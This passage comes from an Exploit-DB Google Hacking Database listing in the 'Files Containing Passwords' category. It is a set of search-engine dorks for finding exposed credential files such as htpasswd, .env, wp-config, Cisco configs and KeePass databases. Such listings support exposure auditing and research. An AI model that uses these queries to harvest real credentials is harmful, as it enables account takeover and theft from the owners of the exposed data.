<querystring>https://www.google.com/search?q=filetype:sql inurl:wp-content/backup-*</querystring>
<edb></edb>
<date>2011-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>275</id>
<link>https://www.exploit-db.com/ghdb/275</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql password</shortDescription>
<textualDescription>Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses.</textualDescription>
<query>filetype:sql password</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Asql+password</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4984</id>
<link>https://www.exploit-db.com/ghdb/4984</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:txt $9$ JunOS</shortDescription>
<textualDescription>filetype:txt $9$ JunOS
Discover Juniper Junos OS Hashes
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:txt $9$ JunOS</query>
<querystring>https://www.google.com/search?q=filetype:txt $9$ JunOS</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>224</id>
<link>https://www.exploit-db.com/ghdb/224</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:url +inurl:&quot;ftp://&quot; +inurl:&quot;@&quot;</shortDescription>
<textualDescription>These are FTP Bookmarks, some of which contain plaintext login names and passwords.</textualDescription>
<query>filetype:url +inurl:&quot;ftp://&quot; +inurl:&quot;@&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Aurl+%2Binurl%3A%22ftp%3A%2F%2F%22++%2Binurl%3A%22@%22</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3805</id>
<link>https://www.exploit-db.com/ghdb/3805</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:xls &quot;username | password&quot;</shortDescription>
<textualDescription>filetype:xls &quot;username | password&quot; This search reveals usernames and/or passwords of the xls documents.
by Stakewinner00
</textualDescription>
<query>filetype:xls &quot;username | password&quot;</query>
<querystring>https://www.google.com/search?q=filetype:xls &quot;username | password&quot;</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>45</id>
<link>https://www.exploit-db.com/ghdb/45</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:xls username password email</shortDescription>
<textualDescription>This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank &quot;template&quot; forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective.</textualDescription>
<query>filetype:xls username password email</query>
<querystring>https://www.google.com/search?q=filetype%3Axls+username+password+email</querystring>
<edb></edb>
<date>2003-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5046</id>
<link>https://www.exploit-db.com/ghdb/5046</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:xml config.xml passwordHash Jenkins</shortDescription>
<textualDescription>Find Jenkins Password Hashes
filetype:xml config.xml passwordHash Jenkins
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:xml config.xml passwordHash Jenkins</query>
<querystring>https://www.google.com/search?q=filetype:xml config.xml passwordHash Jenkins</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>62</id>
<link>https://www.exploit-db.com/ghdb/62</link>
<category>Files Containing Passwords</category>
<shortDescription>htpasswd</shortDescription>
<textualDescription>This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*</textualDescription>
<query>filetype:htpasswd htpasswd</query>
<querystring>https://www.google.com/search?q=filetype%3Ahtpasswd+htpasswd</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>23</id>
<link>https://www.exploit-db.com/ghdb/23</link>
<category>Files Containing Passwords</category>
<shortDescription>htpasswd / htgroup</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit...</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;.htpasswd&quot; &quot;htgroup&quot; -intitle:&quot;dist&quot; -apache -htpasswd.c</query>
<querystring>https://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&amp;safe=off&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>22</id>
<link>https://www.exploit-db.com/ghdb/22</link>
<category>Files Containing Passwords</category>
<shortDescription>htpasswd / htpasswd.bak</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;.htpasswd&quot; htpasswd.bak</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22Index+of%22+%22.htpasswd%22+htpasswd.bak</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7548</id>
<link>https://www.exploit-db.com/ghdb/7548</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;/pfx-password.txt&quot; &quot;[To Parent Directory]&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;/pfx-password.txt&quot; &quot;[To Parent Directory]&quot;
# Files Containing Passwords
# Date:31/10/2021
# Exploit Author: Marko Žlender</textualDescription>
<query>intext:&quot;/pfx-password.txt&quot; &quot;[To Parent Directory]&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;/pfx-password.txt&quot; &quot;[To Parent Directory]&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5470</id>
<link>https://www.exploit-db.com/ghdb/5470</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;@gmail.com&quot; intext:&quot;password&quot; inurl:/files/ ext:txt</shortDescription>
<textualDescription>files containing email and password:
intext:&quot;@gmail.com&quot; intext:&quot;password&quot; inurl:/files/ ext:txt
ext:txt intext:&quot;@gmail.com&quot; intext:&quot;password&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intext:&quot;@gmail.com&quot; intext:&quot;password&quot; inurl:/files/ ext:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;@gmail.com&quot; intext:&quot;password&quot; inurl:/files/ ext:txt</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5285</id>
<link>https://www.exploit-db.com/ghdb/5285</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;aspx&quot; filetype:txt login &amp; password</shortDescription>
<textualDescription># Exploit Title: text files containing the user names and passwords.
# Google Dork: intext:&quot;aspx&quot; filetype:txt login &amp; password
# Author: ahmed mohammed adel - from egypt
@hmed@del
</textualDescription>
<query>intext:&quot;aspx&quot; filetype:txt login &amp; password</query>
<querystring>https://www.google.com/search?q=intext:&quot;aspx&quot; filetype:txt login &amp; password</querystring>
<edb></edb>
<date>2019-07-24</date>
<author>ahmed mohammed adel</author>
</entry>
<entry>
<id>6433</id>
<link>https://www.exploit-db.com/ghdb/6433</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;db_database&quot; ext:env intext:&quot;db_password&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;db_database&quot; ext:env intext:&quot;db_password&quot;
# Exposed database credentials (username and password).
# Date: 23/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;db_database&quot; ext:env intext:&quot;db_password&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;db_database&quot; ext:env intext:&quot;db_password&quot;</querystring>
<edb></edb>
<date>2020-07-23</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4279</id>
<link>https://www.exploit-db.com/ghdb/4279</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;eav&quot; filetype:txt</shortDescription>
<textualDescription>Files containing usernames &amp; passwords of NOD32 antivirus accounts.
Google dork:
intext:&quot;eav&quot; filetype:txt
Thanks!
D0bby</textualDescription>
<query>intext:&quot;eav&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=intext:&quot;eav&quot; filetype:txt</querystring>
<edb></edb>
<date>2016-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1112</id>
<link>https://www.exploit-db.com/ghdb/1112</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;enable password 7&quot;</shortDescription>
<textualDescription>some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com</textualDescription>
<query>intext:&quot;enable password 7&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22enable+password+7%22</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>678</id>
<link>https://www.exploit-db.com/ghdb/678</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;enable secret 5 $&quot;</shortDescription>
<textualDescription>sometimes people make mistakes and post their cisco configs on &quot;help sites&quot; and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string.</textualDescription>
<query>intext:&quot;enable secret 5 $&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22enable+secret+5+%24%22</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4222</id>
<link>https://www.exploit-db.com/ghdb/4222</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;END_FILE&quot; ext:log</shortDescription>
<textualDescription>Description: Files containing passwords
Google search: intext:&quot;END_FILE&quot; ext:log
Author: nebo_oben</textualDescription>
<query>intext:&quot;END_FILE&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:&quot;END_FILE&quot; ext:log</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4140</id>
<link>https://www.exploit-db.com/ghdb/4140</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;GET http://&quot; ext:txt intext:&quot;password&quot; inurl:log</shortDescription>
<textualDescription>this dork will return password sent in GET request from proxies logs.
submitted by: Mohammad Al-Nasser</textualDescription>
<query>intext:&quot;GET http://&quot; ext:txt intext:&quot;password&quot; inurl:log</query>
<querystring>https://www.google.com/search?q=intext:&quot;GET http://&quot; ext:txt intext:&quot;password&quot; inurl:log</querystring>
<edb></edb>
<date>2015-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6188</id>
<link>https://www.exploit-db.com/ghdb/6188</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;Index of /password&quot;</shortDescription>
<textualDescription>Dork: intext:&quot;Index of /password&quot;
Description: This google dorks lists out password folders on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intext:&quot;Index of /password&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of /password&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7605</id>
<link>https://www.exploit-db.com/ghdb/7605</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;index of&quot; &quot;uploads&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;index of&quot; &quot;uploads&quot;
# Files containing juicy information
# Date: 05/11/2021
# Author: Onkar Deshmukh
</textualDescription>
<query>intext:&quot;index of&quot; &quot;uploads&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; &quot;uploads&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7682</id>
<link>https://www.exploit-db.com/ghdb/7682</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;Index of&quot; intext:&quot;password.zip&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Index of&quot; intext:&quot;password.zip&quot;
# Files Containing Passwords
# Date:8/11/2021
# Exploit Author: Parshwa Bhavsar</textualDescription>
<query>intext:&quot;Index of&quot; intext:&quot;password.zip&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of&quot; intext:&quot;password.zip&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Parshwa Bhavsar</author>
</entry>
<entry>
<id>4899</id>
<link>https://www.exploit-db.com/ghdb/4899</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;login&quot; department | admin | manager | company | host filetype:xls | xlsx -community -github</shortDescription>
<textualDescription>Some spreadsheet containing passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;login&quot; department | admin | manager | company | host filetype:xls | xlsx -community -github</query>
<querystring>https://www.google.com/search?q=intext:&quot;login&quot; department | admin | manager | company | host filetype:xls | xlsx -community -github</querystring>
<edb></edb>
<date>2018-08-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7615</id>
<link>https://www.exploit-db.com/ghdb/7615</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:ghostbin.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:ghostbin.com
# Files Containing Passwords
# Date:5/11/2021
# Exploit Author: Nisrin Ahmed</textualDescription>
<query>intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:ghostbin.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;password&quot; | &quot;passwd&quot; | &quot;pwd&quot; site:ghostbin.com</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Nisrin Ahmed</author>
</entry>
<entry>
<id>4896</id>
<link>https://www.exploit-db.com/ghdb/4896</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;please change your&quot; password |code | login file:pdf | doc | txt | docx -github</shortDescription>
<textualDescription>Passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;please change your&quot; password |code | login file:pdf | doc | txt | docx -github</query>
<querystring>https://www.google.com/search?q=intext:&quot;please change your&quot; password |code | login file:pdf | doc | txt | docx -github</querystring>
<edb></edb>
<date>2018-08-01</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>976</id>
<link>https://www.exploit-db.com/ghdb/976</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;powered by EZGuestbook&quot;</shortDescription>
<textualDescription>HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database http://www.securityfocus.com/bid/13543/info/</textualDescription>
<query>intext:&quot;powered by EZGuestbook&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22powered+by+EZGuestbook%22</querystring>
<edb></edb>
<date>2005-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>761</id>
<link>https://www.exploit-db.com/ghdb/761</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;powered by Web Wiz Journal&quot;</shortDescription>
<textualDescription>Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html</textualDescription>
<query>intext:&quot;powered by Web Wiz Journal&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22powered+by+Web+Wiz+Journal%22&amp;c2coff=1&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-12-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4809</id>
<link>https://www.exploit-db.com/ghdb/4809</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;PuTTY log&quot; ext:log &quot;password&quot; -supportforums -github</shortDescription>
<textualDescription>intext:&quot;PuTTY log&quot; ext:log &quot;password&quot; -supportforums -github
File containing passwords
ManhNho
</textualDescription>
<query>intext:&quot;PuTTY log&quot; ext:log &quot;password&quot; -supportforums -github</query>
<querystring>https://www.google.com/search?q=intext:&quot;PuTTY log&quot; ext:log &quot;password&quot; -supportforums -github</querystring>
<edb></edb>
<date>2018-05-08</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4920</id>
<link>https://www.exploit-db.com/ghdb/4920</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;rabbit_password&quot; | &quot;service_password&quot; filetype:conf</shortDescription>
<textualDescription>Passwords in openstack setups.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;rabbit_password&quot; | &quot;service_password&quot; filetype:conf</query>
<querystring>https://www.google.com/search?q=intext:&quot;rabbit_password&quot; | &quot;service_password&quot; filetype:conf</querystring>
<edb></edb>
<date>2018-08-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5747</id>
<link>https://www.exploit-db.com/ghdb/5747</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;username=&quot; AND &quot;password=&quot; ext:log</shortDescription>
<textualDescription>Log files containing credentials
</textualDescription>
<query>intext:&quot;username=&quot; AND &quot;password=&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:&quot;username=&quot; AND &quot;password=&quot; ext:log</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5237</id>
<link>https://www.exploit-db.com/ghdb/5237</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;wordpress&quot; filetype:xls login &amp; password</shortDescription>
<textualDescription>Excel files containing the user names and passwords.
Google Dork: *intext:&quot;wordpress&quot; filetype:xls login &amp; password*
Author: Prasad Borvankar.
</textualDescription>
<query>intext:&quot;wordpress&quot; filetype:xls login &amp; password</query>
<querystring>https://www.google.com/search?q=intext:&quot;wordpress&quot; filetype:xls login &amp; password</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Prasad Borvankar</author>
</entry>
<entry>
<id>5769</id>
<link>https://www.exploit-db.com/ghdb/5769</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:&quot;WPENGINE_SESSION_DB_USERNAME&quot; || &quot;WPENGINE_SESSION_DB_PASSWORD&quot;</shortDescription>
<textualDescription>WPEngine credentials exposed
--
*Hilary Soita.*
</textualDescription>
<query>intext:&quot;WPENGINE_SESSION_DB_USERNAME&quot; || &quot;WPENGINE_SESSION_DB_PASSWORD&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;WPENGINE_SESSION_DB_USERNAME&quot; || &quot;WPENGINE_SESSION_DB_PASSWORD&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>4040</id>
<link>https://www.exploit-db.com/ghdb/4040</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:@pwcache &quot;parent directory&quot;</shortDescription>
<textualDescription>intext:@pwcache &quot;parent directory&quot;
Best regards,
Adam Bedard</textualDescription>
<query>intext:@pwcache &quot;parent directory&quot;</query>
<querystring>https://www.google.com/search?q=intext:@pwcache &quot;parent directory&quot;</querystring>
<edb></edb>
<date>2015-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5815</id>
<link>https://www.exploit-db.com/ghdb/5815</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:authentication set encrypted-password ext:cfg</shortDescription>
<textualDescription># Google Dork: intext:authentication set encrypted-password ext:cfg
# By using this dork, passwords in configuration files can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:authentication set encrypted-password ext:cfg</query>
<querystring>https://www.google.com/search?q=intext:authentication set encrypted-password ext:cfg</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3801</id>
<link>https://www.exploit-db.com/ghdb/3801</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:charset_test= email= default_persistent=</shortDescription>
<textualDescription>find facebook email and password ;)</textualDescription>
<query>intext:charset_test= email= default_persistent=</query>
<querystring>https://www.google.com/search?q=intext:charset_test= email= default_persistent=</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4594</id>
<link>https://www.exploit-db.com/ghdb/4594</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:connectionString &amp; inurl:web &amp; ext:config</shortDescription>
<textualDescription>*Category:*
Files containing passwords
*Summary:*
A Google dork that gives SQL connection information (sql server ip,
username and password).
*Dork discovered by:*
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>intext:connectionString &amp; inurl:web &amp; ext:config</query>
<querystring>https://www.google.com/search?q=intext:connectionString &amp; inurl:web &amp; ext:config</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>6723</id>
<link>https://www.exploit-db.com/ghdb/6723</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:construct('mysql:host</shortDescription>
<textualDescription># Google Dork: intext:construct('mysql:host
# Date: 12/1/2020
# Exploit Author: Javier Bernardo
Files containing passwords
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>intext:construct('mysql:host</query>
<querystring>https://www.google.com/search?q=intext:construct('mysql:host</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4012</id>
<link>https://www.exploit-db.com/ghdb/4012</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:DB_PASSWORD ext:env</shortDescription>
<textualDescription>This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.
Author: Augusto Pereira</textualDescription>
<query>intext:DB_PASSWORD ext:env</query>
<querystring>https://www.google.com/search?q=intext:DB_PASSWORD ext:env</querystring>
<edb></edb>
<date>2015-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4535</id>
<link>https://www.exploit-db.com/ghdb/4535</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:DB_PASSWORD || intext:&quot;MySQL hostname&quot; ext:txt</shortDescription>
<textualDescription>Google Dork: intext:DB_PASSWORD || intext:&quot;MySQL hostname&quot; ext:txt
Author: Tarkan Catal X
This dork allows you to search for WordPress configuration file.
This file contains Username, Password, Secret Keys and other juicy information.</textualDescription>
<query>intext:DB_PASSWORD || intext:&quot;MySQL hostname&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=intext:DB_PASSWORD || intext:&quot;MySQL hostname&quot; ext:txt</querystring>
<edb></edb>
<date>2017-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4878</id>
<link>https://www.exploit-db.com/ghdb/4878</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:define('AUTH_KEY', ' wp-config.php filetype:txt</shortDescription>
<textualDescription>WordPress config files
Mattias Borg</textualDescription>
<query>intext:define('AUTH_KEY', ' wp-config.php filetype:txt</query>
<querystring>https://www.google.com/search?q=intext:define('AUTH_KEY', ' wp-config.php filetype:txt</querystring>
<edb></edb>
<date>2018-07-02</date>
<author>Mattias Borg</author>
</entry>
<entry>
<id>4126</id>
<link>https://www.exploit-db.com/ghdb/4126</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</shortDescription>
<textualDescription>Files with Passwords of http and https servers in format xls and xlsx.
Enjoy well.
Dork By Rootkit Pentester.</textualDescription>
<query>intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</query>
<querystring>https://www.google.com/search?q=intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</querystring>
<edb></edb>
<date>2015-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5010</id>
<link>https://www.exploit-db.com/ghdb/5010</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:jdbc:oracle filetype:java</shortDescription>
<textualDescription>Find Oracle Database Credentials:
intext:jdbc:oracle filetype:java
Discovered By: Kevin Randall
</textualDescription>
<query>intext:jdbc:oracle filetype:java</query>
<querystring>https://www.google.com/search?q=intext:jdbc:oracle filetype:java</querystring>
<edb></edb>
<date>2018-11-06</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>4711</id>
<link>https://www.exploit-db.com/ghdb/4711</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:password inurl:&quot;/log/production&quot; ext:log</shortDescription>
<textualDescription>Rails web application Framework stores passwords and tokens in plain text i
the log.
Bruno Schmid
</textualDescription>
<query>intext:password inurl:&quot;/log/production&quot; ext:log</query>
<querystring>https://www.google.com/search?q=intext:password inurl:&quot;/log/production&quot; ext:log</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4123</id>
<link>https://www.exploit-db.com/ghdb/4123</link>
<category>Files Containing Passwords</category>
<shortDescription>intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</shortDescription>
<textualDescription>Spreadsheets with pop3 and smtp login details.
Decoy</textualDescription>
<query>intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</query>
<querystring>https://www.google.com/search?q=intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7274</id>
<link>https://www.exploit-db.com/ghdb/7274</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle: &quot;Index of ftp passwords&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;Index of ftp passwords&quot;
# Files Containing Passwords
# Date:12/09/2021
# Exploit Author: Romell Marin Cordoba
</textualDescription>
<query>intitle: &quot;Index of ftp passwords&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Index of ftp passwords&quot;</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>6557</id>
<link>https://www.exploit-db.com/ghdb/6557</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;database.php&quot; inurl:&quot;database.php&quot; intext:&quot;db_password&quot; -git -gitlab</shortDescription>
<textualDescription># Google Dork: intitle:&quot;database.php&quot; inurl:&quot;database.php&quot; intext:&quot;db_password&quot; -git -gitlab
# Exposed database usernames and passwords.
# Date: 22/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;database.php&quot; inurl:&quot;database.php&quot; intext:&quot;db_password&quot; -git -gitlab</query>
<querystring>https://www.google.com/search?q=intitle:&quot;database.php&quot; inurl:&quot;database.php&quot; intext:&quot;db_password&quot; -git -gitlab</querystring>
<edb></edb>
<date>2020-09-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5943</id>
<link>https://www.exploit-db.com/ghdb/5943</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of &quot; &quot;*.passwords.txt&quot;</shortDescription>
<textualDescription>#Description :
intitle:&quot;index of &quot; &quot;*.passwords.txt&quot;
intitle:&quot;index of&quot; inurl:passwords
intitle:&quot;index of /&quot; &quot;credentials.zip&quot;
intitle:&quot;index of /&quot; &quot;passwords.zip&quot;
intitle:&quot;index of /&quot; &quot;tokens.zip&quot;
File containing username and passwords
Author : Vaibhav Lakhani
Date : 22 April 2020
*Screenshot :*
[image: image.png]
--
Regards,
Vaibhav Lakhani
</textualDescription>
<query>intitle:&quot;index of &quot; &quot;*.passwords.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;*.passwords.txt&quot;</querystring>
<edb></edb>
<date>2020-04-23</date>
<author>Vaibhav Lakhani</author>
</entry>
<entry>
<id>4748</id>
<link>https://www.exploit-db.com/ghdb/4748</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of /&quot; inanchor:.kdbx</shortDescription>
<textualDescription>This will find KeePass databse files in open web directories, to download
and potentionally bruteforce.Use responsible and ethical!
Dork by _palone
</textualDescription>
<query>intitle:&quot;index of /&quot; inanchor:.kdbx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; inanchor:.kdbx</querystring>
<edb></edb>
<date>2018-04-06</date>
<author>_palonE</author>
</entry>
<entry>
<id>6340</id>
<link>https://www.exploit-db.com/ghdb/6340</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/master.passwd&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/master.passwd&quot;
# Date: 30/06/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/master.passwd&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/master.passwd&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6693</id>
<link>https://www.exploit-db.com/ghdb/6693</link>
<category>Files Containing Passwords</category>
<shortDescription>intitle:&quot;index of&quot; &quot;anaconda-ks.cfg&quot; | &quot;anaconda-ks-new.cfg&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;anaconda-ks.cfg&quot; | &quot;anaconda-ks-new.cfg&quot;
# Files containing passwords.
# Date: 20/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;anaconda-ks.cfg&quot; | &quot;anaconda-ks-new.cfg&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;anaconda-ks.cfg&quot; | &quot;anaconda-ks-new.cfg&quot;</querystring>
